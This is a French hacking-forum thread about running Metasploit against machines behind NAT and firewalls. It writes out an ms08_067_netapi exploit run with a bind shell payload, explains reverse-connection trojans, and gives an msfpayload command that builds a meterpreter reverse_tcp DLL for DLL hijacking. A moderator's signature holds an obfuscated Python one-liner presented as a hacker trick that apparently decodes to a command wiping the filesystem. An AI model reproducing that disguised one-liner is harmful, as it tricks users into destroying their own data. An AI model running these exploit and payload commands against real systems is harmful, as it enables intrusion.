Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-10-2010 23:44:39

thib02140
Membre
Inscription : 04-10-2010
Messages : 16

Metasploit mais pas en local

Bonsoir,
je voulais savoir s'il était possible d'utiliser metasploit autre qu'en local?
Je voudrais en fait tester metasploit sur ma connexion personnelle mais depuis la connexion de mon lieu de résidence étudiant.
Merci d'avance

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-10-2010 23:58:01

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

Salut

Bien sûr que tu peux l'utiliser en externe, ca n'aurait pas beaucoup d'intérêt sinon smile Le seul problème, c'est de passer les pare-feux. Celui de ta connexion personnelle tu devrais pouvoir lui ouvrir les ports qui vont bien, mais pour le firewall de la résidence ca va être chaud...

Ca dépend quel type d'attaque tu veux tester (meterpreter, je suppose ?), mais si ton port est ouvert chez toi, avec un payload en attente, tu peux t'y connecter en reverse à travers le firewall de l'école. Dis nous en plus sur ton scénario d'attaque, et on pourra détailler wink

Hors Ligne

#3 18-10-2010 09:00:26

thib02140
Membre
Inscription : 04-10-2010
Messages : 16

Re : Metasploit mais pas en local

Salut,
Merci de cette réponse rapide.
je me met seulement à metasploit, je ne connais pas encore tres bien mais n'étant pas la semaine chez moi je voulais essayer cette outils, peux tu m'en dire plus sur meterpreter, ... .
Merci d'avance

Hors Ligne

#4 18-10-2010 18:47:58

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Metasploit mais pas en local

Salut thib02140 smile
Regarde ce topic du forum ,il regroupe pas mal d'info sur l'utilisation de metasploit Tutoriels Metasploits et tu as aussi google big_smile .

Dernière modification par raylook (18-10-2010 18:48:38)


fete.gif

Hors Ligne

#5 18-10-2010 19:42:46

thib02140
Membre
Inscription : 04-10-2010
Messages : 16

Re : Metasploit mais pas en local

Merci bien

Hors Ligne

#6 18-10-2010 23:23:29

thib02140
Membre
Inscription : 04-10-2010
Messages : 16

Re : Metasploit mais pas en local

Petite question comment puis je scanner les PC de mon domicile connecté en utilisant uniquement mon ip public?
je sais qu'en local on peut utiliser auxilary/scanner/discovery/udp_sweep mais en avec l'ip public??

Merci

Hors Ligne

#7 18-10-2010 23:34:51

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

Si tu es derrière un routeur (ex : une box) avec le NAT activé (ce qui est très probable), c'est impossible hmm Tout simplement parce que le routeur en question a 2 interfaces (au moins), chacune avec ses 65535 ports. Donc en lançant un scan sur ton IP externe, tu vas scanner les ports externes, qui ne sont (normalement) pas ouverts par défaut wink

Après, si tu actives le port forwarding (redirection de ports, ou serveur virtuel, ou "ouverture de ports") pour rediriger un/des port(s) externe(s) vers une machine de ton LAN, alors le port en question peut être scanné depuis l'extérieur (puisque le NAT a pour ordre de faire suivre la requêtes vers le LAN). Mais sans instruction explicite, le routeur prendra toutes les requêtes externes pour lui, et tu n'auras aucune info sur le LAN wink
C'est logique en même temps : comment le routeur peut-il deviner vers laquelle des 254 machines potentielles du réseau il doit renvoyer les requêtes ?

Pour scanner ton réseau interne, il te faut donc un point d'entrée vers ton LAN (par exemple une machine vulnérable ouverte vers l'extérieur via un port forwarding). Tu attaques cette machine, tu en gagnes le contrôle, et tu t'en sers comme tête de pont pour scanner/attaquer le reste de ton LAN smile
2 avertissements :
- c'est une technique relativement avancée, donc difficile à maîtriser, commence par gérer les bases de Metasploit
- fais très attention si tu mets une machine vulnérable ouverte vers l'extérieur (je déconseille fortement) wink

Si tu veux faire tes tests sur ton LAN depuis ta résidence étudiante, tu peux laisser une machine avec BackTrack allumée chez toi, avec le serveur SSH activé et accessible depuis l'extérieur (toujours cette histoire port forward). Ensuite, quand tu es en résidence, tu ouvres une session SSH (sécurisée) sur ta machine attaquante restée sur ton LAN, et tu es "du bon côté" pour faire les tests que tu veux (en ligne de commande) smile

[EDIT] Meterpreter est une espèce de "console améliorée" que tu peux utiliser sur une victime pour avoir des infos sur le système, obtenir les droits ADMIN, up/downloader des fichiers vers la victime, lancer des scripts (keylogger;...), bref un outil sympa pour un hacker/pentester smile --> Metasploit et Meterpreter pour du piratage facile ?

Hors Ligne

#8 20-10-2010 22:45:36

thib02140
Membre
Inscription : 04-10-2010
Messages : 16

Re : Metasploit mais pas en local

Bonsoir,
après quelque test avec metasploit je n'arrive à aucun résultat.
Voici les commandes que j'effectue:
-use exploit/windows/smb/ms08_067_netapi
-set RHOST 192.168.1.102     // le pc auquel je veux accéder
- set PAYLOAD windows/shell/bind_tcp   // pour pouvoir accéder au cmd de ma machine 192.168.1.102
- exploit // pour lancer le tout.

Normalement apres cela je devrai avoir un acces à ma machine distante mais voilà ce que j'obtiens:

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:French
[*] Selected Target: Windows XP SP3 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Hors Ligne

#9 21-10-2010 12:11:12

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

Ca veut sans doute dire que la vulnérabilité ms08_67_netapi a été corrigé ou désactivée sur ta cible smile C'est le problème avec les tutos Metasploit, ils ont une "validité" limitée.

Merci de ne pas transformer ce topic en questions générales sur Metasploit, restons-en sur la question de l'accès distant wink

Hors Ligne

#10 21-10-2010 18:29:50

thib02140
Membre
Inscription : 04-10-2010
Messages : 16

Re : Metasploit mais pas en local

ok, je pensais que je faisait une fausse manip.
Quelle autre vulnérabilité existe pour xp sp3?
De plus pour l'accès distant cela doit quand même être faisable même si l'ordinateur distant se trouve derrière une box, des logiciels pas très recommandables comme sub7, spynet, arrive bien à avoir accès à des pc distants.

un petit problème avec ma virtualbox expliqué ici, quelque fois que vous auriez la solution.

Merci.

Dernière modification par thib02140 (21-10-2010 18:38:54)

Hors Ligne

#11 21-10-2010 21:18:54

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

thib02140 a écrit :

De plus pour l'accès distant cela doit quand même être faisable même si l'ordinateur distant se trouve derrière une box, des logiciels pas très recommandables comme sub7, spynet, arrive bien à avoir accès à des pc distants.

Dans ce cas-là c'est un fonctionnement de type "trojan" : le méchant installe un programme sur l'ordinateur-victime, qui ouvre une connexion (sortante) vers le serveur, que le méchant contrôle (j'évite volontairement le terme "hacker").
Comme les firewalls grand-public ne bloquent aucune connexion sortante, le trojan ne se fait pas bloquer, et le résultat est le même (une connexion existe entre la victime et l'attaquant) ; mais la façon de faire est inverse, d'ailleurs tu peux utiliser les payloads "reverse" de Metasploit pour te créer ton trojan smile

Pour la vunlérabilité sur XP SP3, je n'en sais rien ca fait bien longtemps que je n'ai pas étudié la question hmm Avec un peu de chance un spécialiste passera par ici, mais sinon j'ai peur que tu doives faire le tour des sites d'exploits pour en trouver un... Ou alors sur Youtube, "Metasploit XP sp3" t'as quelques vidéos qui peuvent être intéressantes wink

Hors Ligne

#12 21-10-2010 21:24:57

Syfer
Membre Indispensable
Inscription : 09-06-2010
Messages : 507
Site Web

Re : Metasploit mais pas en local

antares145 a écrit :

Avec un peu de chance un spécialiste passera par ici

Le spécialiste Syfer a la rescousse tongue ! non avec ms08_67_netapi et xp sp3 sa marche pas c'est un genre de mise a jours ajouter dans le sp3 qui ne marche plu cette methode. en fin c'est sa que j'ai lu smile


masignature.gif

Hors Ligne

#13 08-12-2010 19:52:04

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Metasploit mais pas en local

excusez moi mais il y a quelque chose que je ne comprend pas, pour qu'il teste metasploit sur le réseaux de son école il faut bien que le ports 4444 soit ouverts sur leur routeurs et qu'il soit redirigée, non ?

Hors Ligne

#14 08-12-2010 22:20:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

Qu'est-ce que tu appelles "leur routeur" ? Celui de l'école ? Alors non smile

Ce qui compte pour Metasploit (et plus généralement pour tout échange TCP ou UDP), c'est qu'un "canal" soit établi entre 2 hôtes, peu importe qui initie l'ouverture de ce canal. Par défaut, dans le cas de Metasploit, la partie "client" qui s'installe sur la victime se met en écoute sur le port 4444 et attend que l'attaquant s'y connecte. Effectivement, dans cette configuration, il faudrait que le port 4444 soit ouvert et redirigé.

Mais Metasploit propose aussi les payloads dits "reverse", où c'est la partie client (sur la victime) qui lance une connexion sortante pour aller se connecter à l'attaquant (qui est en écoute ailleurs). Le résultat est le même (un canal existe entre les 2), mais comme le NAT (et la majorité des firewall grand public) ne filtrent pas les connexions sortantes, il est possible de se connecter de cette façon smile

D'ailleurs, vu la généralisation du NAT actuellement, la grosse majorité des trojans et autres crasswares fonctionnent comme ça wink

Hors Ligne

#15 10-12-2010 17:24:34

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Metasploit mais pas en local

OK merci ta réponse est très claire.
Mais il y a encore un truc sur lequel je bloque: le routeur du réseaux de son école est en NAT, donc tout les ordis du réseaux ont la même ip internet,  comment peut t'il faire pour cilber le pc qu'il a dans son école avec Metasploit étant donné que le réseaux possède qu'une seule ip publics.

Hors Ligne

#16 10-12-2010 21:52:28

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

Encore une fois, tu considères le problème à l'envers smile Comme c'est l'ordi-victime (derrière le NAT) qui initie la connexion, l'attaquant n'a pas besoin de cibler le PC puisqu'il vient à lui wink

Techniquement, il n'a même pas besoin de savoir qu'il y a plusieurs ordis derrière l'IP publique : pour l'attaquant, il y a juste une IP (la publique) et une connexion avec celle-ci qui débouche sur une session de metasploit smile

S'il y avait plusieurs cibles derrière le même NAT, alors c'est différent. Mais dans ce cas, je pense qu'elles sont différenciées par le port utilisé (ou par le NAT lui-même, qui différencie automatiquement les connexions sortantes).

Hors Ligne

#17 10-12-2010 22:03:52

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Metasploit mais pas en local

Ici il parle de l'exploit "ms08_067_netapi" donc le routeur distant doit redirigé les ports sinon il ne peut pas cibler une machine en particulier wink


Sharkoff

Hors Ligne

#18 10-12-2010 22:37:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Metasploit mais pas en local

Squaks a écrit :

Ici il parle de l'exploit "ms08_067_netapi" donc le routeur distant doit redirigé les ports sinon il ne peut pas cibler une machine en particulier wink

Exact au temps pour moi, je me focalise trop sur le scénario "trojan" et pas sur l'exploitation de failles hmm

Effectivement, tu ne peux pas (directement) exploiter ce genre de faille depuis l'extérieur, sauf éventuellement en envoyant ta cible sur un "site" piégé, qui exploiterait alors une faille du navigateur.

Merci pour la précision, oh grand Squaks ! big_smile

Hors Ligne

#19 10-12-2010 23:07:07

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Metasploit mais pas en local

Oh mais de rien ! tongue

Sinon une technique à mi-chemin entre l'exploit et le trojan c'est le Dll Hijacking qui consiste (comme son nom l'indique) à "hijacker" une dll d'une application vulnérable en mettant une dll "custom" générer par metasploit mais portant le même nom que l'original à coté du fichier à ouvrir. L'application va s'ouvrir et si elle est vulnérable va charger la mauvaise dll et donc lancer le payload wink

msfpayload windows/meterpreter/reverse_tcp LHOST=IP_PUBLIQUE LPORT=REDIRECTED_PORT D > NOM_DLL

Et bien sur ca fonctionne en remote (contraire de local) à condition d'ouvrir les ports de NOTRE routeur


Sharkoff

Hors Ligne

#20 11-12-2010 19:32:31

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Metasploit mais pas en local

Ok donc si je comprend bien je ne risque aucune attaque du genre "ms08_67_netapi" venue d'internet, si un ports de metasploit n'est pas redirigée vers mon pc.

Hors Ligne

#21 11-12-2010 20:05:13

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Metasploit mais pas en local

Lucas021 a écrit :

Ok donc si je comprend bien je ne risque aucune attaque du genre "ms08_67_netapi" venue d'internet, si un ports de metasploit n'est pas redirigée vers mon pc.

Salut
"Si un port de routeur" tu veux dire tongue , dans ce cas directement depuis internet non wink.
L'exploit ms08_67_netapi peut très bien etre exploiter localement (127.0.0.1) pour élever ces privilèges (en administrateur) par exemple smile.


fete.gif

Hors Ligne

#22 11-12-2010 22:09:05

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Metasploit mais pas en local

D'accord merci
j'avais réussi a exploiter cette faille localement sur un pc de mon réseaux smile

Hors Ligne

#23 13-08-2012 13:03:54

lemich
N00b
Inscription : 13-08-2012
Messages : 1

Re : Metasploit mais pas en local

bonjour, un petit coup de pousse pour l utiliser sur le web serait pas de refus : set-web permission denied

Hors Ligne

#24 13-08-2012 14:30:34

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Metasploit mais pas en local

@lemich :
- une question = un topic
- donne des détails
- bonjour
- *pouce

- la balise 'code' sert à mettre du texte en forme 

- attention (:


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#25 13-08-2012 15:09:29

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Metasploit mais pas en local

lemich a écrit :

bonjour, un petit coup de pousse pour l utiliser sur le web serait pas de refus : set-web permission denied

Tu remonte un topice vieux de 2ans, et tout sa pour??


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.042 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]